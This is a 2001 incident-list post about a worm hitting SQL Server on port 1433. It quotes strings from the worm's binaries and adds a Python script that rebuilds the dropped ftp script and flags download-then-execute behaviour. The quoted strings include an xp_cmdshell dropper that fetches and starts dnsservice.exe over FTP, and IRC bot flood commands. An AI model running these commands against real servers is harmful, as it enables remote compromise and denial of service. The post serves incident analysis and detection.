On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:
>
> We saw a scan come in looking for systems answering on 1433, and
> immediately saw several systems start scanning out for other systems
> answering on 1433 - worm behavior? Has anyone else seen this?

No, but the binaries it downloads, win32mon.exe and dnsservice.exe, are on
the ftp site in the dump. I don't have a windows debugger to put them
through but they look interesting:

exec xp_cmdshell 'start dnsservice.exe'
exec xp_cmdshell 'del ftp.x'
exec xp_cmdshell 'ftp -s:ftp.x
exec xp_cmdshell 'echo quit >> ftp.x'
exec xp_cmdshell 'echo close >> ftp.x'
exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
exec xp_cmdshell 'echo cd tmp>> ftp.x'
exec xp_cmdshell 'echo cd pub>> ftp.x'
exec xp_cmdshell 'echo bin>> ftp.x'
exec xp_cmdshell 'echo foo.com>> ftp.x'
exec xp_cmdshell 'echo ftp> ftp.x'

GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
[GET] - Unable to connect to http.
[GET] - Unable to resolve host.
http://
[GET] - Unable to create new socket.
GET <bot|wildcard> <host> <save as>
%s %s %s %s
NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu)
NICK %s
NOTICE %s :Nick cannot be larger than 9 characters.
NOTICE %s :NICK <nick>
sm6 has finished... with tcp/syn boost!
sm6 icmp/udp has begun...
sm6 icmp/udp (w/pkt-push!) has begun..
Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file>

etc.

Paul Nasrat

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 10:23:11 PST
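The xp_cmdshell sequence quoted above is the classic "build an ftp script with echo, run ftp -s:, delete it, start the payload" dropper. When such a batch is recovered from a SQL Server trace or a captured TDS session, the useful analyst step is to replay the cmd.exe redirections to recover the dropped script and to tie the ftp "get" to the later "start". The following is an added example of that analysis logic, written for this note and not code from the original post or from the worm; the sample batch is constructed from the strings quoted in the post, put into the order the attacker would have to send them (the strings dump lists them in reverse), and the regexes, function names and the closing quote on the ftp -s: line are my own assumptions.

```python
"""Reconstruct files dropped through xp_cmdshell 'echo ...>> file' and flag the
ftp-download-then-execute pattern.  Added example; not from the original post."""
import re

# Constructed sample input: the commands quoted in the post, in execution order.
SAMPLE_BATCH = """exec xp_cmdshell 'echo ftp> ftp.x'
exec xp_cmdshell 'echo foo.com>> ftp.x'
exec xp_cmdshell 'echo bin>> ftp.x'
exec xp_cmdshell 'echo cd pub>> ftp.x'
exec xp_cmdshell 'echo cd tmp>> ftp.x'
exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
exec xp_cmdshell 'echo close >> ftp.x'
exec xp_cmdshell 'echo quit >> ftp.x'
exec xp_cmdshell 'ftp -s:ftp.x'
exec xp_cmdshell 'del ftp.x'
exec xp_cmdshell 'start dnsservice.exe'
"""

# exec / execute, optional master.. or master.dbo. prefix, T-SQL string with '' escapes.
XP_CMDSHELL = re.compile(
    r"exec(?:ute)?\s+(?:master\.\.|master\.dbo\.)?xp_cmdshell\s+'((?:[^']|'')*)'", re.I)
ECHO_REDIR = re.compile(r"^echo\s+(.*?)\s*(>>|>)\s*(\S+)$", re.I)   # echo text[ ]>[>] file
FTP_SCRIPT = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)                  # ftp -s:script
GET_LINE = re.compile(r"^m?get\s+(\S+)", re.I)                       # ftp get/mget
START_CMD = re.compile(r"^start\s+(\S+)", re.I)                      # start program
DEL_CMD = re.compile(r"^(?:del|erase)\s+(\S+)", re.I)                # del file


def extract_commands(batch):
    """Return the OS commands in the order the T-SQL batch would run them."""
    return [m.group(1).replace("''", "'").strip() for m in XP_CMDSHELL.finditer(batch)]


def reconstruct_files(cmds):
    """Replay cmd.exe echo redirection: '>' truncates the file, '>>' appends to it."""
    files = {}
    for cmd in cmds:
        m = ECHO_REDIR.match(cmd)
        if not m:
            continue
        text, op, name = m.groups()
        name = name.lower()                      # Windows file names are case-insensitive
        if op == ">" or name not in files:
            files[name] = []
        files[name].append(text)
    return files


def analyze(batch):
    """Summarize a batch: dropped files, files fetched by scripted ftp, and any
    downloaded file that is later started.  Returns a plain dict for reporting."""
    cmds = extract_commands(batch)
    files = reconstruct_files(cmds)
    downloaded, executed, deleted = set(), [], []
    for cmd in cmds:
        m = FTP_SCRIPT.match(cmd)
        if m:
            # Read the reconstructed script the way ftp -s: would, collecting get targets.
            for line in files.get(m.group(1).lower(), []):
                g = GET_LINE.match(line)
                if g:
                    downloaded.add(g.group(1).lower())
            continue
        m = START_CMD.match(cmd)
        if m and m.group(1).lower() in downloaded:
            executed.append(m.group(1).lower())
            continue
        m = DEL_CMD.match(cmd)
        if m:
            deleted.append(m.group(1).lower())
    return {
        "commands": cmds,
        "files": files,
        "downloaded": sorted(downloaded),
        "executed": executed,
        "deleted": deleted,
        "download_and_execute": bool(executed),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_BATCH)
    for name, lines in report["files"].items():
        print(f"dropped {name}:")
        for line in lines:
            print("   ", line)
    print("fetched via ftp:", report["downloaded"])
    print("executed after fetch:", report["executed"])
    print("download-and-execute:", report["download_and_execute"])
```

On the sample batch this recovers ftp.x line by line (user "ftp", password "foo.com", bin, cd pub, cd tmp, get dnsservice.exe, close, quit) and flags dnsservice.exe as fetched and then started. A batch that only runs "dir" produces no finding, and a second "echo x> file" correctly discards what was appended before it, which matters when a dropper reuses the same scratch file name for several downloads.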